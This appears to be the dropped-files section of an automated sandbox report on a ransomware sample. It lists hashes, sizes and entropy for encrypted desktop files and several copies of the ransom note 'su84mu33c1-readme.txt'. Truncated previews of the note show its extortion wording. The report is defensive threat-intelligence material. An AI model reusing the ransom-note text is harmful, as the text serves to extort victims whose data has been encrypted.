          SHA-256:5D3A8A48AACB912E862C9D576D448BC7190711217C5C1BD6EE0B6DB0AD90F002
          SHA-512:746F879DD450C7AD421666208B1A7CA4491D72F39BBF014D7ACD8C8AE01A86783190D4FC5F459E6A54AB50E8E4F459017496AA756695BB8EBB1F2C07A5DAEAEF
          Malicious:true
          C:\Users\user\Desktop\UOOJJOZIRH\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
Preview (UTF-16LE text, decoded; truncated in the report):
          ---=== Welcome. Again. ===---
          [+] Whats Happen? [+]
          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
          [+] What guarantees? [+]
          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Desktop\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.848977833322646
          Encrypted:false
          SSDEEP:24:y3zLlvlkCqlr70Z0DjFIVQK8luwvMghT5Abe+XADn+z0:yFv+C4ZDjFIVQK8luwvBeeiu+w
          MD5:4DE5CE7D22C863E5FE85AE736DD85596
          SHA1:C4F9F7B1DFE70D13811462980A86476CD575218C
          SHA-256:6EF8146F5039BBA07D4D28B22B79567258F707EE061443EA2810C5E144047F40
          SHA-512:175FF8B5F70E6E8A43F52163AAE09821E1E489FD6E2BE02E12F2CEB4C48401A9BB353EC89BFC56F4EB283007765F7D6D5B8E91A2B816D291FD6C695E79268D9A
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.826502793750154
          Encrypted:false
          SSDEEP:24:kEfzr/YBZsr2HFrFc2atxaGtR3IGzicQmXADn+zE6GrA:kUzr4g2jZatPRXecQau+xGrA
          MD5:DDA7DBCE977F645F09FC68C9615AEBFD
          SHA1:653366BA45928AA81BE834DA70C0BCF1FBCCB35F
          SHA-256:AAEE8F098350A0C04235CF88FD7249424328875273F45E7AF077DDE4A7364529
          SHA-512:8810B9A40698EB398A1A199488D0DBF8D4517E68E5D4D4219E7E414BB7B0EB339AE525895CF127C500800C080D98AC012722EA75286D52E39DE7047D3E3118C8
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.829322670866774
          Encrypted:false
          SSDEEP:24:zbBLTE1h7a54Fydup/mejKk0vMXHyHoWbCv1VIQ3f2aLXADn+zYL:zbBQe05eWUDHoWboIGftu+2
          MD5:69CD774757F79A29F46D8E8DD2454CA9
          SHA1:A6D6BF74BF86357A2ADADCB0B2271475B7DAFC5D
          SHA-256:C29AFA8392358410C1F7CEC48284E20899E525A43B8B231F82FFB550931F5BA1
          SHA-512:B4F45D33631CB4D21D1CF1A923A765BA17180DE01ABF794963A0BEA7516FC9598595CE665ECED098267341223E8CFF88A1EA2D51B4F87F8C8732FA5F680AED6C
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND\GRXZDKKVDB.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.845561965928946
          Encrypted:false
          SSDEEP:24:xMyFMAjxvTMNEwXlj6VJArLjlk80NoNSqtscPPvXADn+zAEWg/w:KbAj5TMNXu80g/PPu+cuw
          MD5:70035DBE015930D3F4A09839B1389017
          SHA1:4F1AABB2AAB4FF8D195B1FD0419974F348298F3B
          SHA-256:B810D14304837B0A9C39CFCD24365B737F9DF45D7EA23EF0146E6FBEBF9EF308
          SHA-512:E76B223A165684015D17F406BDA92250D8169EE3798C06D100CA17A4CA4EF1B2598DCE3C95760EE96F88D3290B7C77081622DCD7AC60EF577090A1A78EFA05F3
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND\PWCCAWLGRE.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8530730063494
          Encrypted:false
          SSDEEP:24:WtcLqoUHUHNHVsfkPQlq52FeeVUBeLGitXADn+zdp:WtcDUYBVMkIq2F3UB6bpu+5p
          MD5:9250C7C695E0ED75CE425C15075E1AF9
          SHA1:2ED96BD607AC5E2BEEE3EA5D896D40C3D002057C
          SHA-256:EF8420A78C5EC8CB39BD6337EBE8CD3DC9B4B1A4E9E29E851A9DFA40CAA0C631
          SHA-512:41B868556315269EB372704D3B647B011EBE1829F9262B678FA5BAC7D5A273FF960EF3DB453EC6CC1A55A644E72F1CF8C98A8FE23F6528F6E66AF9B939BA0422
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND\SFPUSAFIOL.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.835300424053646
          Encrypted:false
          SSDEEP:24:1IwGlCn3fOejqgKQ5cMestmz5/zN3/mPdkKamI0OKaDIXADn+zDWnN:1IB63ljbKIxmz5/zN3ePOKO0Qwu+PgN
          MD5:5DECDD68EB392CEBC18782C8E18CE3F6
          SHA1:7F5462B5926172074BA8345A4437B9168C14A6CE
          SHA-256:C4B334ECAD0B9D81B66A8091ADED16223C53472997AD7F64EA18633A06BBE862
          SHA-512:D9E7845244D567533789104CC7C1C59FA9C90DE493A23283F67D35CEA80C8A51F81BE7F46FF585C4B127E6466113B93C52774308F19C926F83844F977BA867EC
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND\SQSJKEBWDT.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.855168607015851
          Encrypted:false
          SSDEEP:24:EZgLNKI83N7m+VkLW2yUwXEA4rRFwq1sKbLs1jF/BXADn+zFN:fKIIrVkLah0hRFrLs1jJFu+n
          MD5:6A7926C0E31ACA4AC9D318B4BB4BB234
          SHA1:BEDB0798CFE1D6B73183D9E2277BC3B29F4E5D8B
          SHA-256:E317F025CAD79585ACD88AC62AF0CAD9FF40BE9BD7B0F91B9555DFF4EFD6A32E
          SHA-512:5B9C0BDCD79862AE2273E016640F7C706B0C065DDE3315001EA1DA32B7BF216ED187D9758C83292DFFE33AAF3962C631B770D1EAB292BBC99B314CBA11239537
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND\VAMYDFPUND.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.836184922072691
          Encrypted:false
          SSDEEP:24:Q5Vpk06syn4vxkhjP9vmqAW/Z48mKCX9u2BksULUiXADn+zYOzr:QCUvxE1vOO4821BkskU+u+ca
          MD5:A8F9240E136004AB585E7D9A44409B76
          SHA1:212B0A68ED33E8292B7F8BE9BEC01F74005B45CA
          SHA-256:5EFA51FE811DE0EE04344515DF70A5A99BC5C5BAAE60DB141959FF7A9055F0C5
          SHA-512:328DF4917AAC604E9CF241DF99869FEBCF052A889DC90430C59012F8B140B2A7454E7569BBBD93F092DAD591FBF6C7086B00E6B1E96A8CF0B3AB4E940A229B2E
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8554823606673265
          Encrypted:false
          SSDEEP:24:GmnpS+3D80A4l+MGQIgpr+tjkHImTS/LgNlcylgTXADn+z7nGpn:7nprXlBGPsr+ZkU0Ndlg7u+HGpn
          MD5:BE808413B22E01E30C03FE9D5B49695E
          SHA1:2816F75304B0EA2F8BB33A8F4C8A7EF4FE542768
          SHA-256:63F010D5A6EB9CE5458B0263A566991D9EB03B0546B577DD511500FB5DE0273E
          SHA-512:D0B696C0E2C6B662824B1DA65D21B05D18CA5B3C12269924DD64E149C59D96F401828149DCF657CAABCDB9BFFEAC321DC0B3D51C8A8DC65761693A2E441CD8CE
          Malicious:false
          C:\Users\user\Desktop\VAMYDFPUND\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Desktop\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.828783409135878
          Encrypted:false
          SSDEEP:24:WM1W6iicwKMk44iQEPdBQnSsyqs2t0GryzriyLXADn+zjr4kqb:1W0f4jpSs5JrSeGu+f1Y
          MD5:54E387E1D99C7E3360702A85742CF36A
          SHA1:87C27D5D10E6506A9DB0B29010A63787ACCC66FE
          SHA-256:60E733EEEA0C650550B32E62C3736725835950E7D5611A08713E6702D5F14321
          SHA-512:B1CBBB54E9C61E2782AD6372F971EC842EF216458E94B29DCF58E799F0B05C4B6433961BB1C062E77D9FA9941A053463BDC5F2A0648F8B44A464F24D6E7F4212
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.828336922622897
          Encrypted:false
          SSDEEP:24:Yt8rcgE3D1mT+uoMQS9SZByJie4ZiMkNhT4pqxk3hYWTI5AHQFYiviswORXADn+X:TrARuoQ9SZZe4ZiMkNtOhnVH/IFwO1ua
          MD5:E53362AB7EEBCF8FBC23E46E26CA76DD
          SHA1:A845913A24FFD23561D0B565C430DB1E7DC8C2DF
          SHA-256:EEBF082A66EAC8FE27F9C4849E563152BA957691F7DC7E38DF87F5CA078596AB
          SHA-512:ABBDF1B850FEC62D44A5000C896EFB0CB6DCAAA92E8433ADAA691CCB3EBD59530D7868867227D18273EC4318BA2455DA46113828437879F69F0442359E7842D2
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI\NEBFQQYWPS.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.835317660470376
          Encrypted:false
          SSDEEP:24:3/dagh/6FWn8V7FYF8FvCf+CdXv2Wy8BwadNbe5hJNS6xn0aQVcyHuXADn+zLb:Pdt8VxcMvCmeXv2Wy8BfdNbeHRHAcyHU
          MD5:C791ECF5EBD6A5C938F3B377C1EAAB68
          SHA1:7B4D4006F0E70E0437754EBE38FFD3A663EC2FF2
          SHA-256:9C5218721D4CF25E130F6FC9026EF07453BE9F0C5A51F202AB2D5B26B91D71E9
          SHA-512:47CF822E217FB93758780E58B8A328CB9AC6B418989D09AFC727BF6BBA907A0C9849B6A75F0CF87B3206D51D41B6968C70E9FADA469089CEE1371722CAF36A3A
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI\SFPUSAFIOL.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.831209809369885
          Encrypted:false
          SSDEEP:24:brvq4X17GqW5qreiymvBqen1y46sdC3n/RrL92psVXADn+zJO:HxUf5QaYqkdzmrx2pshu+k
          MD5:1EFA103B274CFF68E991BE20E000FEBF
          SHA1:9C25C85E5DACDBC7E776832818F27485DBF28805
          SHA-256:420E0E3FED61670F317DA16B380E62AC5EFAE4AE50A3685918CFD6E6DA5F557F
          SHA-512:7661B2C81ECE1D7C3E08D65BDB38253CC1886BF20E8BADEC927A62716CE5521F1A5619B34679027DE96A2BBF38005CACD325B4BB5F0804374C9C583800B3957D
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI\UOOJJOZIRH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.851717017472232
          Encrypted:false
          SSDEEP:24:yUnFla79r3z5pd8jcaI01LCheS2s6LBnTUt+PyzXlyiumXr7XA1AdWsXADn+zbk2:y805Dh8jc2TS2vyZPTXf+8u+Xk2
          MD5:8A8514BF35B33371C92173139E321E3E
          SHA1:35CD53FD74BBEF82F0A524FD9122639C519BED86
          SHA-256:098709ED272D62D375156F8E54DDF7D34B1CA424F043D4884CFA6A7CD90C5BD3
          SHA-512:A1CBBD1BD87D28A5522F1D6FD9CDEF77AE9CD33E754D74D45614F2A9CD63D0AE460E5E1A533839A58377FCAB4A0B625A0F8A32C0059F59470B1B3382FC97C1A1
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI\VAMYDFPUND.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854449523299915
          Encrypted:false
          SSDEEP:24:DUUeRH206i0czoX63zFThcFW2dxbK91vGEYni+ToWXADn+zS:DURH206DcUm/cFW86bgoqu+G
          MD5:5CAE2C6EAA00A512B4451C1939818EE7
          SHA1:10178BBAA7259E96A08ECC328304C56C5FABF86F
          SHA-256:05CFF0B72FE698684BF9794623CE8C70AE8B0BFDC1B600792FDC64E93611B324
          SHA-512:3260EA1B4E1A26A87B2CEBBD779D80E72588E2E9A93EE7436BCCCB6EB2ACEF7831611CCDCE246D3B244DEE05D3A5E1679CF2254B11E9F2798DEA6467D7C2DB17
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI\WKXEWIOTXI.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.854232788573278
          Encrypted:false
          SSDEEP:24:r1EYcsJt+u7hNbPR0UX8nLotN8nxNSTQfZ6vzigjmICujpXADn+ztxN:rSQJt++PlvX8Lu8nSsIvvCuZu+p
          MD5:7394DD4398D359E98F09572F58FA1B78
          SHA1:B6A6582A7EAE88C4AC2639B784DECE2C090E8941
          SHA-256:7F83896DE8BFF90AD01B05A73143E88543D4DDF7C08A33FDD4A5A530D64058C7
          SHA-512:C806A4204A6EBF5A77A52ABE563700663A67660FC0E7C2709B0E0F376E36C3EB6F353ADCDA2D8C404F3ABBED2D3DA7A27FAA59AB30CB0C3E7D100FD92389D5B4
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.849660825393839
          Encrypted:false
          SSDEEP:24:+iwqGTqczabd9VBd3jV7lYX5ET9TGSj/jsJRe2s96d2uY4BMYiUpXADn+zhyIn:wg9Fj25I9TbsJR49JH4Digu+Bn
          MD5:4DA612F44E78C2A0D0C5E468066E8220
          SHA1:0D6841716BE95DB1DEC9D4D7D80E986BA4AFCE9E
          SHA-256:9AE7C1CF4E1D11183C78AB93DFB76EF1CB871248CCFEA66A7FEDDAB37B6EADD1
          SHA-512:1F15DF77866A8DAFA72BFC698675BD5D798DF601FEC18EEB915700824E627FDDB17F84B2CAFFB47256B4857F63938F780EEC3CE004B9FFCE1D5B3EA2627E31BF
          Malicious:false
          C:\Users\user\Desktop\WKXEWIOTXI\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview: ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Desktop\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.856462513464044
          Encrypted:false
          SSDEEP:24:vKZJWWY60znUeNgyAUcNTaaMpUldcZchtxp1O//GMDrnJXADn+zsZk:4JWWY60zUeNluTfMIfRp1kG6u+Ya
          MD5:BE74EC45614134149B6F9B457C57C4F6
          SHA1:04F6FBB8A75F87328B6CDB7E3FEA5A4BE0FA1181
          SHA-256:A3C61BE50BC97B3FDF6C65173649A0C4586267619522632F9E818357794644D3
          SHA-512:DE762ACD1C9A3365B6B1B6424EDE98828EECBB01D1D8D20ECBC7185733535FDF2632CCD49D2FD252500B8436FB86EE06D3D95EF7B0AE456AE3D3EC027608CB9E
          Malicious:false
          C:\Users\user\Desktop\ZQIXMVQGAH.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.840953421603471
          Encrypted:false
          SSDEEP:24:oO3iSndLf+DLWYkeQcIfNaQ7+kUbi+mVL4rCYlotkbnpXCXADn+zX:oodLyceQvE7kUqB4rCjSbnpXeu+j
          MD5:C79782FB7A83B392132FF5DDCB734511
          SHA1:3D69E2B6AC041D1A216A908852AB03BD584C0325
          SHA-256:E9005C1FC1716CBF0BC9827F2367802E96EEBA902CB305788549F495C27AA8C0
          SHA-512:ECF24C17F5F09D5BECEDAB38CC6A29A4E58F9DF6CD276EF3700656656A89C9101FDF2204F4936FB30C93B3EF11F4D0998C4103FE8C1BC57A8B579F32F6437EB7
          Malicious:false
          C:\Users\user\Desktop\ZQIXMVQGAH.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8367714203235925
          Encrypted:false
          SSDEEP:24:7nhjYaW+lyplHWkOcVc9hnk0RQ0eTcowrv2bWwr0b10LTcKXADn+zbB:7n9YaW+lkWkO3/nk0RJe4oDJ0h0ju+/B
          MD5:34B8EB547D04E4E7F7F30901434618E3
          SHA1:AE00AE6ADF718F511B4674ADCDF3FC9A7EFB2D88
          SHA-256:A525A5AA38C266DE0389EA9621CDFE8A4756AFE3925A3DBF02F0D453DC51CEF9
          SHA-512:D7A5263DD228C01ABB36E902BC5FAA3FD861302F2A32C34F5E55CD31EDB890CA837E6EC580B3BE53383F82292EE409B1991B6C43F8F104567364148C7A815D19
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.843480389886071
          Encrypted:false
          SSDEEP:24:z/FQle5mrMhXJifYAJ7OGmHnt/6SQHNcFrBsgsSPo98gdpyjnHkACsSbXADn+zRn:bul1AhcgAsGYtjfFP2NpyjnEACsSTu+F
          MD5:B1DAF9D6C8197B9BCE19E16C16818748
          SHA1:2D288846930A223C07BC9C5A32E39662C9860543
          SHA-256:D42A6FD91535B3D6E41EB79EBC2232B06E523F150AC396AAC6B8165FAE8CEEDE
          SHA-512:EC882872BFA8F9601C53D376E472B12F33968F58F03417FFE862452974A8C483299461B30A2A536F5723E9109B6DAB672DD422CCE1EED4E092904A9DCEEBBCE0
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.844228057796375
          Encrypted:false
          SSDEEP:24:SpXLN6Gc3QHhzHBqLUyReoSYCrfMcG3RduzHV3mffV1kXADn+zOW:qXEGcAxB0UiLcw3nt3ou+yW
          MD5:C192573D0FE63112726FD10DE8C618DF
          SHA1:D7729C1FFF10580B496E738AE040687995B12CD5
          SHA-256:FB805D12D05A0AC3B3E0705610A2D3F26DB8745C401E0D900BDB9104D03DC836
          SHA-512:4B5650433153EC7675405AF95A4B8E2BD2651F6308A1E18F2B926F0AB682E19B2F36D73B672D0F6DF8EFB1CBCDFE9588E88C4D63D7D990802A8C512DF4D14BDA
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB\IPKGELNTQY.pdf
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.816718805089984
          Encrypted:false
          SSDEEP:24:7AwKq8fX5WJ9QZ+5yF5Gxx78eGX6N8zfHB2jGwFc6q/i/UB34XADn+zRHWA:58/5kY+I5GP7LGX6N8rHB2j1qitu+1HD
          MD5:F83645C65F9CC217422064127E49AC70
          SHA1:06BC96BA74DBDBD29E11D7092C13C7C0356F1C7A
          SHA-256:7836A6A59EA5C69B7D63806F3ED5163E4B5DC40766F8AC7D58E0AEBCBD158ED4
          SHA-512:CC46E0CB4781DCDEC85B28D14A71EA1F3E084F0AAD222B4BD2513A88AB7B7EA2D5DAA4590BD6FE9F4DF503D2C257AE9B9DC93FA622377BCCC31E729458AF64D6
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB\PIVFAGEAAV.mp3
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.839380775521346
          Encrypted:false
          SSDEEP:24:wyHtZjUYySWoMs+IPNzSzl8BemS9AeA0yas/Ve5UCNTKZTAdztAXADn+zGx:rHEaLkmUA/asteqGTeAt4u+i
          MD5:DD6FF0D5B5194BE124F75925BBC742E8
          SHA1:B5D709620B287510311EC19DA81698DEF3E2DB4A
          SHA-256:9FC4D3FEA5F93A04A8887C8B6E79F928DAA0C971062A209CC0021637C1FA5EA4
          SHA-512:4730AE9BA70366A4F47290819BF0F58A90088CB3580FA19212960514FFA042CCA7ACC7E54B30E29DC3692BCDBE1F2B0126855CA2045C7B99F37DE901093CF52A
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB\QCFWYSKMHA.png
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.866030602232337
          Encrypted:false
          SSDEEP:24:2otbXl1Yz8+lHBqy+31PH8CkCnINjAn193iwTqQy6vwvcLXADn+zZjOIv:2Q1Yz8+0pRkWFnbiCqQykju+ljDv
          MD5:515C420104DE4447560CE6FF82D80832
          SHA1:9B47B8645F690548FFE0B07BFFB01B686C968DA1
          SHA-256:B98D384369B4303A082DC1A52D4A7A6E3892D6B82C282FE3B9825DC695243D05
          SHA-512:5F3D9BF245D138B6A995DF585335FD70518147779E778E274F0D2F17C549C671C8FBBA03AA873022227DFFC3E9921D7DB8DB9A02A47C37A0FADE72B7C660040A
          Malicious:true
          C:\Users\user\Desktop\ZTGJILHXQB\UOOJJOZIRH.xlsx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.86323651837165
          Encrypted:false
          SSDEEP:24:ZYlP4Maantr/YlPygVOviIQIAqQXrE6gh9qOhkfxg0CXADn+zVSQ2:ZYzpV/YlPDVhRIAVXrEPHhhkfGu+oQ2
          MD5:1C67978998D176C6DCFFDEA8ABAC763C
          SHA1:E80B24282711D4261F197E4ED0D37816584F66A5
          SHA-256:AFB5A6AB91868C62FA463B48EF58EC713759DE7930AA16B2FB1744C9B61FED66
          SHA-512:3BD0F3E2E9D20294535317929E04432D9296FD7E85A5FFA17D289D862667B6AA2B2A6D96F5BCD59282699C2194BCBE0DFB2AC0784D04AF0DDA3D552C6D5CCDEE
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB\ZQIXMVQGAH.jpg
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.8447331440222845
          Encrypted:false
          SSDEEP:24:fGjz2warpjZZpcUDXns8L3F9k4aLVFx3VWqXoNkRjDBSXADn+zZhnq:SzzyjZZpcUD3s0A9LHbWB6VOu+thq
          MD5:87B08F4781CAE8AB22C621448BEBD693
          SHA1:6D15E33AEA49746A9438579AE83E6CBE53E68B9A
          SHA-256:8A05A9B34100F471EF86735CFCBDFF90045EDC108D11973AB8F60CC822A9F3E8
          SHA-512:138E3FF8CC64DCB8933F8DFA97C49E90343DF87189E551ECE63BF5B788A811555581EC439731A76CB89346F13EE42D41B49B68BDC7E01F73DC0B1F657E19091A
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB\ZTGJILHXQB.docx
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):1258
          Entropy (8bit):7.859237866278076
          Encrypted:false
          SSDEEP:24:Z/D4N4dhK0PCucNU/Ws1eXHnIJpoDro5js08baRtdk3Yg00XADn+zpM6IE:BMN4dA06hU+sUX2GXMjybqW3Yg00u+64
          MD5:D9D4850151BA69171DC36FB9989D598F
          SHA1:39902CDB63B54EB6BE0D6558622A161B6E4493D0
          SHA-256:34C18D66BA2FB4DECA32C14E28EB115C7921B0B1D51790C5E45140A667C0DD15
          SHA-512:546B0B50AD6B2940BBDE0A67613B5F9B55A0FF45D79F4D53E81280A74CF37D30884C01367C7B725672B73FCE3D702E86A967363709D2502ECC1A39F492610649
          Malicious:false
          C:\Users\user\Desktop\ZTGJILHXQB\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
          SSDEEP:96:GLFiNsg6xU3TPCg/e5ruWRQtw6CE8wqXqdX/yVZ//yvJVvYd9PrR5u:GLFI3jNm5NRweEpqaCZHyvTYDW
          MD5:AC24FEF346A4ABC3D58DC0A275DD2B6D
          SHA1:D3E8478274AF8DAC23A93E92935A82CE842E4D0C
          SHA-256:61E4594725A672557902324A10158C82EED2565BBF33A022249F6160E4FA7AA0
          SHA-512:C0C002EF44B15144CFAA9561E27BFE19216F9B6E59252513550A69F3C7845F4395F4BC4403C15B392B3F8785A9C64A86E8067E1589441867CBAFAD4D630607E1
          Malicious:false
          Preview (UTF-16LE text, decoded):
          ---=== Welcome. Again. ===---

          [+] Whats Happen? [+]

          Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension su84mu33c1.
          By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

          [+] What guarantees? [+]

          Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nob
          C:\Users\user\Desktop\su84mu33c1-readme.txt
          Process:C:\Users\user\Desktop\Sample_5fba9b06c7da400016eb6275.exe
          File Type:data
          Category:dropped
          Size (bytes):6986
          Entropy (8bit):3.884573571713338
          Encrypted:false
